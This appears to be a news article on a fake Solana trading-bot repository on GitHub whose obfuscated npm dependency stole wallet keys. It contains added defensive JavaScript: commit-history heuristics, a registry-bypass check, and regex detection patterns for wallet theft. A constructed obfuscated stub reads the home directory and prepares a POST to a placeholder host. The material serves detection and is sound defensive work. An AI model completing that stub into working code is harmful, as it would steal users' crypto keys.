A GitHub repository, deceptively posing as a legitimate Solana trading bot, has been exposed for reportedly concealing crypto-stealing malware. According to a recent report by blockchain security firm SlowMist, the now-deleted “solana-pumpfun-bot” repository, hosted by the account “zldp2002,” mimicked a real open-source tool with the intent of harvesting user credentials. SlowMist initiated its investigation after a user reported that their funds had been stolen, highlighting the immediate impact of this sophisticated digital deception on unsuspecting cryptocurrency holders.
Artificial Popularity and Code Irregularities
The malicious GitHub repository in question exhibited a “relatively high number of stars and forks,” a common tactic used by threat actors to create an illusion of legitimacy and widespread adoption. However, SlowMist’s analysis revealed significant irregularities: all code commits across its directories were made approximately three weeks prior to the discovery, with a distinct lack of consistent patterns that would typically characterize a genuine, actively developed project. These inconsistencies served as crucial indicators of the repository’s fraudulent nature, despite its artificially inflated popularity metrics.
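The irregularities SlowMist describes (a history compressed into one short burst, popularity out of proportion to the repository's age, silence afterwards) can be turned into a quick triage check. The following is an added example, not SlowMist's tooling or anything from the repository in question; it assumes the input is the output of `git log --format=%ct` plus the star and fork counts from the repository page, and the thresholds and all sample timestamps are constructed.

```javascript
// Added example, not SlowMist's tooling: heuristics over a repository's commit
// timestamps and its star/fork counters, modelled on the irregularities described
// above (all commits in one short burst, popularity out of proportion to age).
// Real input would be `git log --format=%ct` (unix seconds, newest first) plus the
// counters from the repository page; everything below is constructed sample data.

const DAY = 86400;

// Parse `git log --format=%ct` output into ascending unix timestamps.
function parseCommitTimes(gitLogOutput) {
  return gitLogOutput
    .split('\n')
    .map((line) => line.trim())
    .filter((line) => /^\d+$/.test(line))
    .map(Number)
    .sort((a, b) => a - b);
}

function assessRepository({ commitTimes, stars, forks, now }) {
  if (commitTimes.length === 0) return { flags: ['no-commits'] };
  const first = commitTimes[0];
  const last = commitTimes[commitTimes.length - 1];
  const spanDays = (last - first) / DAY; // how long the history actually spans
  const ageDays = (now - first) / DAY;   // how old the repository is
  const idleDays = (now - last) / DAY;   // time since the last commit
  const flags = [];

  // A genuine project accumulates commits over time. Five or more commits all
  // landing within two days, with nothing before or after, looks like a bulk
  // import of prepared code rather than development.
  if (commitTimes.length >= 5 && spanDays <= 2) flags.push('commit-burst');

  // Stars and forks that outrun the repository's age are the "artificially
  // inflated popularity" signal; the thresholds are arbitrary starting points.
  const popularityPerDay = (stars + forks) / Math.max(ageDays, 1);
  if (ageDays < 60 && popularityPerDay > 10) flags.push('popularity-outruns-age');

  // A burst followed by weeks of silence matches the report: commits made roughly
  // three weeks before discovery and never touched again.
  if (flags.includes('commit-burst') && idleDays > 14) flags.push('dormant-after-burst');

  return { flags, spanDays, ageDays, idleDays };
}

// Constructed sample: a fixed "now" keeps the example reproducible; eight commits
// 21 days earlier, five minutes apart, then nothing.
const SAMPLE_NOW = 1751000000;
const SUSPICIOUS_LOG = Array.from({ length: 8 }, (_, i) => String(SAMPLE_NOW - 21 * DAY + i * 300))
  .reverse()
  .join('\n');

// Constructed contrast: a year of steady weekly commits.
const STEADY_LOG = Array.from({ length: 52 }, (_, i) => String(SAMPLE_NOW - i * 7 * DAY)).join('\n');

function runHistoryDemo() {
  const counters = { stars: 1200, forks: 900, now: SAMPLE_NOW };
  const suspicious = assessRepository({ commitTimes: parseCommitTimes(SUSPICIOUS_LOG), ...counters });
  const steady = assessRepository({ commitTimes: parseCommitTimes(STEADY_LOG), ...counters });
  return { suspicious: suspicious.flags, steady: steady.flags };
}

if (typeof require !== 'undefined' && require.main === module) console.log(runHistoryDemo());
```

Run against a real clone, the interesting output is the flag list rather than a score: `commit-burst` together with `dormant-after-burst` is the signature the report describes, and it is cheap to compute before reading a single line of the project's code.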
Obscured Malware in a Suspicious NPM Package
The fraudulent project was built using Node.js and leveraged a third-party package named “crypto-layout-utils” as a dependency. Upon further inspection, SlowMist discovered that this particular package had already been removed from the official NPM registry, raising immediate suspicions. Further investigation revealed that the attacker was downloading this library from a separate, hidden GitHub repository. Analysis of the package confirmed it was heavily obfuscated using a tool called jsjiami.com.v7, making its malicious intent harder to decipher. Once de-obfuscated, researchers confirmed it was indeed a malicious package designed to scan local files for wallet-related content or private keys and then upload them to a remote server.
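Two of the details above translate directly into pre-install checks: a dependency that is fetched from a GitHub repository instead of the npm registry is not covered by registry takedowns or lockfile integrity, and a package obfuscated with jsjiami plus file-reading, wallet vocabulary and an outbound request is the harvesting pattern the researchers found. The code below is an added example, not SlowMist's analysis code; it assumes a cloned project's package.json and dependency source as input, the GitHub account name is a placeholder, the indicator thresholds are heuristic, and the "obfuscated" fragment is constructed in the style of such a package rather than taken from it.

```javascript
// Added example, not SlowMist's analysis code: two static checks for a cloned
// Node.js project, run before `npm install`. The first finds dependencies that
// bypass the npm registry (the removed "crypto-layout-utils" was being pulled
// from a separate GitHub repository instead); the second looks for the
// obfuscation and file-harvesting indicators described in the report.
// All sample inputs are constructed; the GitHub account name is a placeholder.

// Specifiers that npm resolves outside the registry: git/GitHub URLs, GitHub
// "owner/repo" shorthand, http(s) tarballs and local paths. Registry removal
// and lockfile integrity checks give no protection for these.
const NON_REGISTRY = /^(git(\+\w+)?:|github:|https?:\/\/|file:|[\w.-]+\/[\w.-]+(#.*)?$)/;

function findNonRegistryDeps(packageJsonText) {
  const pkg = JSON.parse(packageJsonText);
  const findings = [];
  for (const field of ['dependencies', 'devDependencies', 'optionalDependencies']) {
    for (const [name, spec] of Object.entries(pkg[field] || {})) {
      if (NON_REGISTRY.test(spec)) findings.push({ field, name, spec });
    }
  }
  return findings;
}

// Indicators to look for in dependency source. None is conclusive on its own;
// the verdict below combines them. Thresholds are heuristic starting points.
const INDICATORS = [
  // the obfuscator named in the report leaves its own name in its output
  { id: 'jsjiami-banner', re: /jsjiami\.com\.v\d/ },
  // _0x1a2b-style renamed identifiers, typical of obfuscated JavaScript
  { id: 'hex-identifiers', re: /_0x[0-9a-f]{4,}/gi, minHits: 10 },
  { id: 'dynamic-eval', re: /\b(eval|new Function)\s*\(/ },
  // enumerating or reading files under the user's home directory
  { id: 'home-dir-walk', re: /\.homedir\(\)|readdirSync|readFileSync/ },
  // vocabulary of the wallet/private-key content the malware searched for
  { id: 'wallet-terms', re: /wallet|keypair|id\.json|private[_ ]?key|mnemonic/i },
  // an HTTP client being loaded and used to send something out
  { id: 'outbound-request', re: /require\(['"]https?['"]\)[\s\S]*\.request\(|fetch\(|axios\.post\(/ },
];

function scanSource(source) {
  const hits = [];
  for (const ind of INDICATORS) {
    const matches = source.match(ind.re);
    const count = matches ? matches.length : 0;
    if (count >= (ind.minHits || 1)) hits.push(ind.id);
  }
  // Local file reads + wallet vocabulary + an outbound request is the harvesting
  // pattern from the report; obfuscation on top of it is the strongest combined signal.
  const harvesting = ['home-dir-walk', 'wallet-terms', 'outbound-request'].every((h) => hits.includes(h));
  const obfuscated = hits.includes('jsjiami-banner') || hits.includes('hex-identifiers');
  const verdict = harvesting && obfuscated ? 'block' : hits.length > 0 ? 'review' : 'clean';
  return { hits, verdict };
}

// Constructed package.json: one dependency pinned to a GitHub account (placeholder
// name) instead of the registry, beside ordinary semver ranges.
const SAMPLE_PACKAGE_JSON = JSON.stringify({
  name: 'trading-bot-sample',
  dependencies: {
    '@solana/web3.js': '^1.0.0',
    'crypto-layout-utils': 'github:PLACEHOLDER-ACCOUNT/crypto-layout-utils',
    dotenv: '^16.0.0',
  },
});

// Constructed fragment in the style of the obfuscated package (not real code from
// it): renamed identifiers, a home-directory listing, wallet vocabulary and an
// HTTP request, with the actual logic omitted.
const SUSPICIOUS_SOURCE = `//jsjiami.com.v7
const _0x3e1f=require('os'),_0x2a7b=require('fs'),_0x5c9d=require('https');
const _0x1f40=_0x3e1f.homedir(),_0x9a21=['wallet','keypair','id.json'];
const _0x44a2=_0x2a7b.readdirSync(_0x1f40);
/* filtering and upload logic deliberately omitted from this sample */
const _0x7d11=_0x5c9d.request({hostname:'example.invalid',method:'POST'});
`;

const BENIGN_SOURCE = 'module.exports = (a, b) => a + b;';

function runAuditDemo() {
  return {
    nonRegistryDeps: findNonRegistryDeps(SAMPLE_PACKAGE_JSON).map((f) => f.name),
    suspicious: scanSource(SUSPICIOUS_SOURCE).verdict,
    benign: scanSource(BENIGN_SOURCE).verdict,
  };
}

if (typeof require !== 'undefined' && require.main === module) console.log(runAuditDemo());
```

The dependency check is the one worth automating in CI: a `github:` or URL specifier in a project that claims to be an ordinary trading bot deserves a human look regardless of what the source scan says, because it is exactly how a package that has already been removed from the registry keeps getting installed.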
Beyond a Single Repository: A Network of Deception
SlowMist’s ongoing investigation uncovered that the attacker likely controlled a broader network of GitHub accounts. These interconnected accounts were utilized to fork legitimate projects into malicious variations, effectively distributing malware while simultaneously inflating fork and star counts to enhance their deceptive appearance. Multiple forked repositories exhibited similar malicious features, with some versions incorporating another suspicious package, “bs58-encrypt-utils-1.0.3.” This package was reportedly created on June 12, leading SlowMist researchers to believe that this date marked the beginning of the attacker’s widespread distribution of malicious NPM modules and Node.js projects.
A Growing Trend in Software Supply Chain Attacks
This incident represents the latest in a concerning series of software supply chain attacks specifically targeting cryptocurrency users. In recent weeks, similar schemes have been observed, including those that have targeted Firefox users with fake wallet extensions designed to steal credentials. Additionally, other malicious actors have utilized GitHub repositories as hosts for credential-stealing code, underscoring a growing trend where cybercriminals are exploiting trusted platforms and development tools to distribute malware. This method of attack is particularly insidious as it leverages the inherent trust users place in open-source communities and widely used development platforms.
The Stealthy Nature of In-Browser Malware
Unlike traditional phishing scams that rely on fake websites or deceptive emails, these types of malicious browser extensions and code operate directly within the user’s browser environment. This in-browser operation makes them significantly more challenging to detect or block using conventional endpoint security tools, which are often designed to identify external threats. The “low-effort, high-impact approach” of these attacks allows the perpetrators to maintain an expected user experience while simultaneously reducing the chances of immediate detection, enabling them to persist undetected for longer periods and maximize their illicit gains from unsuspecting victims.
User Vigilance and Platform Security are Crucial
The proliferation of such sophisticated scams underscores the critical importance of user vigilance and continuous enhancements in platform security. Cryptocurrency users are strongly advised to exercise extreme caution when downloading and installing any software, especially from open-source repositories or unfamiliar sources. Verifying the legitimacy of developers, scrutinizing code for unusual patterns, and utilizing robust cybersecurity practices are essential. Furthermore, platforms like GitHub and browser extension stores must continually refine their detection mechanisms to identify and remove malicious content swiftly, safeguarding the broader digital ecosystem from these evolving threats.